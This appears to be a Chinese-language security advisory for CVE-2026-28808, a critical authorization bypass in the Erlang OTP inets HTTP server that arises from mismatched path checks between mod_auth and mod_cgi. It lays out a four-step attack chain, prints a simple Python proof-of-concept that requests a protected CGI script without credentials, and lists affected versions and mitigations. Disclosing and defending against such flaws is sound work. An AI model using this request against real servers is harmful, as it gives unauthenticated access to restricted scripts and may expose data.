CVE-2026-28808 CVSS 9.8 严重

CVE-2026-28808 Erlang OTP授权绕过漏洞

披露日期: 2026-04-07

来源: 6b3ad84c-e1a6-4bf7-a703-f496b71e49db

漏洞信息

漏洞编号

CVE-2026-28808

漏洞类型

权限绕过

CVSS评分

9.8 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Erlang OTP (inets模块)

漏洞概述

Erlang OTP的inets模块存在授权绕过漏洞。当使用script_alias将URL映射到DocumentRoot之外的目录时，mod_auth基于DocumentRoot相对路径检查权限，而mod_cgi在ScriptAlias解析路径执行脚本。这种路径不匹配导致未经身份认证的攻击者可访问本应受目录规则保护的CGI脚本。

技术细节

该漏洞源于Erlang OTP HTTP服务器中mod_auth和mod_cgi模块之间的路径处理逻辑不一致。当配置script_alias指向DocumentRoot外部目录时，认证模块（mod_auth）错误地使用相对于DocumentRoot的路径来评估基于目录的访问控制规则。然而，CGI执行模块（mod_cgi）正确地在ScriptAlias解析后的路径上执行脚本。由于这两个路径不匹配，攻击者可以通过构造特定的URL请求，绕过针对该CGI脚本设置的目录访问保护，从而在无需身份验证的情况下执行受限脚本。

攻击链分析

STEP 1

1. 信息收集

攻击者识别目标服务器运行Erlang OTP的inets HTTP服务，并发现通过script_alias配置的CGI脚本路径。

STEP 2

2. 构造请求

攻击者针对受目录规则保护的CGI脚本URL发送HTTP请求，且不携带任何认证凭证。

STEP 3

3. 规则绕过

服务器mod_auth模块检查DocumentRoot相对路径（未受保护），误判请求合法，而mod_cgi模块解析并执行实际路径下的脚本。

STEP 4

4. 执行攻击

攻击者成功获取受限CGI脚本的执行结果，可能导致数据泄露或进一步的控制权获取。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/usr/bin/env python3
import requests

def exploit_cve_2026_28808(target_url):
    """
    PoC for CVE-2026-28808: Erlang OTP inets Authorization Bypass
    This script attempts to access a CGI script protected by directory rules
    via script_alias without authentication.
    """
    headers = {
        "User-Agent": "CVE-2026-28808-Scanner"
    }
    
    try:
        print(f"[*] Attempting to access: {target_url}")
        response = requests.get(target_url, headers=headers, timeout=10)
        
        if response.status_code == 200:
            print("[+] Successfully accessed the CGI script without authentication!")
            print("[+] Response content:")
            print(response.text[:200]) # Print first 200 chars
        else:
            print(f"[-] Request failed with status code: {response.status_code}")
    except requests.exceptions.RequestException as e:
        print(f"[!] An error occurred: {e}")

if __name__ == "__main__":
    # Example target: http://vulnerable-server/cgi-bin/protected/admin.cgi
    target = "http://127.0.0.1/cgi-bin/protected/script.cgi"
    exploit_cve_2026_28808(target)

影响范围

OTP 17.0 至 26.2.5.19

OTP 17.0 至 27.3.4.10

OTP 17.0 至 28.4.2

防御指南

临时缓解措施

建议立即升级到修复版本的Erlang OTP。如果无法立即升级，应禁用ScriptAlias功能或将敏感CGI脚本移回DocumentRoot内并正确配置认证，同时通过防火墙规则严格限制对HTTP服务的访问来源。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表